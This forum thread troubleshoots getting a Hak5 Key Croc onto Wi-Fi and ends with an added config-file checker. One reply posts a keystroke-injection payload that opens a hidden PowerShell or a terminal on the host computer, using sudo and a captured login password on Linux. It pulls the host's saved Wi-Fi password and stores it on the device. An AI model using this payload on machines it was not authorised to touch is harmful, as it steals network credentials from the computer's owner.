alex7272 Posted September 21, 2022

Hi guys,

I’m having issues connecting the croc to Wi-Fi. I’ve had many other devices before successfully configured so I know what I am doing, however I can’t for the life of me connect the croc to Wi-Fi.

The things I have tried:

1. Read the hak5 documentation (600999 times)
2. Read forums about people with same issue (none on here seemed to resolve it successfully)
3. Upgraded to latest 1.3 firmware
4. Factory reset
5. Created multiple easier all lowercase networks and passwords to avoid special characters that require escaping
6. Ran ps ax and killed the dhclient wlan0 and the other wlan command (as suggested in another hak5 post) and brought them back up to no avail
7. I have checked the wpa supplicant conf file and it is showing the correct information
8. I have saved the config file with notepad++ with line endings set to Unix and also saved as a nano in root directory to make sure no funny line endings
9. Tried it on someone else’s complete different network
10. I’ve tested different payloads and they are being executed as expected (except the payloads that grab ip info, they show blank lines)
11. Downgraded to a 1.2 firmware - didn’t fix it either

I’ve spent about 2 days trying to get this working, which it literally is a brand new device out of box. I’ve watched the hak5 demo videos; seems like a very easy device to configure but highly misleading, which is a bit of a let down.

I rarely ever post on forums like this, only posting cause I am completely out of options and no documentation or forums found have helped, as it seems this issue is quite common but no fixes.

Any assistance would be greatly appreciated!! Thank you!!

dark_pyrro Posted September 21, 2022

I guess the networks you have tested weren't all hidden networks, or? If you try to connect to a hidden network, you have to add a line to the wpa_supplicant.conf file. Also (but that's pretty obvious), you have to connect to a 2.4 GHz network/AP.

alex7272 Posted September 26, 2022 (Author)

None of the networks I tested were hidden networks, also all networks tested were 2.4 GHz. I am using my home router for this. Does the router need to be in AP mode? It's just in router mode (not sure if this makes any difference - grasping at straws now).

spywill Posted October 5, 2022 (edited)

Try these payloads and see if they help you to connect to a wifi access point.

This payload: just edit in your SSID name and password and then add the payload to the keycroc payload folder, reboot the keycroc and then type in the match word (mywifi). The led will turn green; the keycroc should be connected to the wifi access point.

May want to delete the config file off your keycroc first just in case it's corrupted in some way. Don't worry, the keycroc will generate a new config file on next boot.

```bash
# Title:         WIFI-SETUP
# Description:   Connect to access point quickly by match word add ssid and passwd
# Author:        spywill
# Version:       1.4
# Category:      Key Croc

MATCH mywifi

SSID_NAME=ADD_SSID_NAME_HERE
SSID_PASSWD=ADD_PASSWORD_HERE

LED SETUP
# Drop the old W*/S* lines from config.txt and append the new settings.
# The appended text is double-quoted so the shell expands $SSID_NAME and $SSID_PASSWD.
sed -i -E -e '/^[WS]/d' -e "9 a WIFI_SSID $SSID_NAME\nWIFI_PASS $SSID_PASSWD\nSSH ENABLE" /root/udisk/config.txt
sleep 1
PID_WPA=$(pidof wpa_supplicant)
PID_DHC=$(pidof dhclient)
ifconfig wlan0 down
# Write a fresh wpa_supplicant.conf with a single network block.
echo -ne "network={\n\tssid=\"$SSID_NAME\"\n\tpsk=\"$SSID_PASSWD\"\n\tpriority=1\n}" > /etc/wpa_supplicant.conf
kill -9 $PID_WPA && kill -9 $PID_DHC
sleep 2
ifconfig wlan0 up
sleep 2
wpa_supplicant -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf -B && dhclient wlan0
sleep 5
systemctl restart ssh.service
sleep 1
# Green LED if an outbound TCP connection succeeds, red otherwise.
if : >/dev/tcp/8.8.8.8/53; then
    LED FINISH
else
    LED R
fi
sleep 3
LED OFF
```

This payload: just add it to the keycroc payload folder, reboot the keycroc and then type in the match word.

getonline_W <-- MATCH word for windows
getonline_L <-- MATCH word for Linux
getonline_R <-- MATCH word for Raspberry pi

Then the led will turn green; the keycroc should be connected to the wifi access point.

```bash
# Title:         Croc_Getonline
# Description:   Attempt to connect Keycroc automatically to target wifi access point
#                Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
# Author:        spywill
# Version:       3.5
# Category:      Key Croc
# Props:         Cribbit, Lodrix, potong, RootJunky, dark_pyrro

MATCH (getonline_W|getonline_R|getonline_L)

CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done

wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt

if [ -f $wifi_pass ]; then
    cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
    rm -f $wifi_pass
fi

ATTACKMODE HID STORAGE
Q DELAY 5000
LED ATTACK

case $LOOT in
    getonline_W)
        Q GUI r
        Q DELAY 3000
        Q STRING "powershell -NoP -NonI -W Hidden"
        Q ENTER
        Q DELAY 5000
        Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
        Q ENTER
        Q DELAY 3000
        Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
        Q ENTER
        Q DELAY 2000
        Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
        Q ENTER
        Q DELAY 2000
        Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
        Q ENTER
        Q DELAY 5000
        Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
        Q ENTER
        ;;
    getonline_R)
        Q CONTROL-ALT-d
        Q CONTROL-ALT-t
        Q DELAY 2000
        Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
        Q ENTER
        Q DELAY 2000
        Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
        Q ENTER
        Q DELAY 2000
        Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
        Q ENTER
        Q DELAY 2000
        Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
        Q ENTER
        Q DELAY 3000
        Q STRING "umount \$MOUNT_POINT ; exit"
        Q ENTER
        ;;
    getonline_L)
        if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
            PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
        else
            PC_PW=LINUX
        fi
        Q CONTROL-ALT-d
        Q ALT-t
        Q DELAY 2000
        Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
        Q ENTER
        Q DELAY 2000
        Q STRING "$PC_PW"
        Q ENTER
        Q DELAY 2000
        Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
        Q ENTER
        Q DELAY 2000
        Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
        Q ENTER
        Q DELAY 2000
        Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
        Q ENTER
        Q DELAY 3000
        Q STRING "sudo umount \$MOUNT_POINT ; exit"
        Q ENTER
        ;;
esac

ATTACKMODE HID
sleep 3
LED SETUP
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then
    sed -i '0,/./s/^.//' $wifi_pass
    sed -i 's/\r//g' $wifi_pass
fi
sed -i 's/\( \)*/\1/g' $wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
sleep 3
systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
sleep 3
LED OFF
```

Edited March 14 by spywill

bhphilos Posted March 12

Hi spywill

I'm having the same issues like alex7272. I've tried your payloads but still no luck!

dark_pyrro Posted March 12

Is your PSK containing special characters that you have escaped using \ ?

spywill Posted March 14

Sometimes I find myself having a hard time running payloads because of the Numlock state on my keyboard. For some reason, after a reboot of my PC, my keyboard Numlock state will be off and my payloads will fail to execute; in this state it will not quack any numbers. I press the Numlock key to turn it to the on state and then run the payload, and then the payload executes. I'm not sure if this will fix the issue.
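
The causes raised in this thread (Windows line endings, password characters that need escaping) can be checked on the device's config.txt before any payload is involved. The following is an added example, not part of any post: the function name `check_croc_config` and the choice of checks are assumptions, the `WIFI_SSID` / `WIFI_PASS` key names are taken from the payload above, and the sample file is constructed.

```shell
#!/bin/sh
# Added example (not from the thread): lint a Key Croc config.txt.
# WIFI_SSID / WIFI_PASS are the key names used in the payload above; the
# function name and the choice of checks are assumptions.

check_croc_config() {
    local file="$1" problems=0 ssid pass cr bom
    [ -r "$file" ] || { echo "cannot read $file"; return 1; }
    cr=$(printf '\r')
    bom=$(printf '\357\273\277')

    # A CR left by a Windows editor becomes part of the SSID or password.
    if grep -q "$cr" "$file"; then
        echo "CRLF line endings"; problems=$((problems + 1))
    fi
    # A UTF-8 byte-order mark hides the first key from line-based parsing.
    if [ "$(head -c 3 "$file")" = "$bom" ]; then
        echo "UTF-8 BOM at start of file"; problems=$((problems + 1))
    fi
    # A trailing space is invisible in an editor but changes the value.
    if grep -q '^WIFI_.* $' "$file"; then
        echo "trailing space on a WIFI_ line"; problems=$((problems + 1))
    fi

    ssid=$(sed -n 's/^WIFI_SSID //p' "$file" | tr -d '\r' | head -n 1)
    pass=$(sed -n 's/^WIFI_PASS //p' "$file" | tr -d '\r' | head -n 1)

    if [ -z "$ssid" ]; then
        echo "WIFI_SSID missing or empty"; problems=$((problems + 1))
    fi
    # WPA/WPA2 personal passphrases are 8 to 63 characters long.
    if [ "${#pass}" -lt 8 ] || [ "${#pass}" -gt 63 ]; then
        echo "WIFI_PASS length ${#pass} is outside 8-63"; problems=$((problems + 1))
    fi
    # A backslash is only right if it is a deliberate escape.
    case "$pass" in
        *\\*) echo "WIFI_PASS contains a backslash"; problems=$((problems + 1)) ;;
    esac
    return "$problems"
}

# Constructed sample: file saved with Windows line endings and a short password.
sample=$(mktemp)
printf 'WIFI_SSID homenet\r\nWIFI_PASS short\r\nSSH ENABLE\r\n' > "$sample"
check_croc_config "$sample" || echo "problems found: $?"
rm -f "$sample"
```

The return value is the number of findings, so a clean file returns 0.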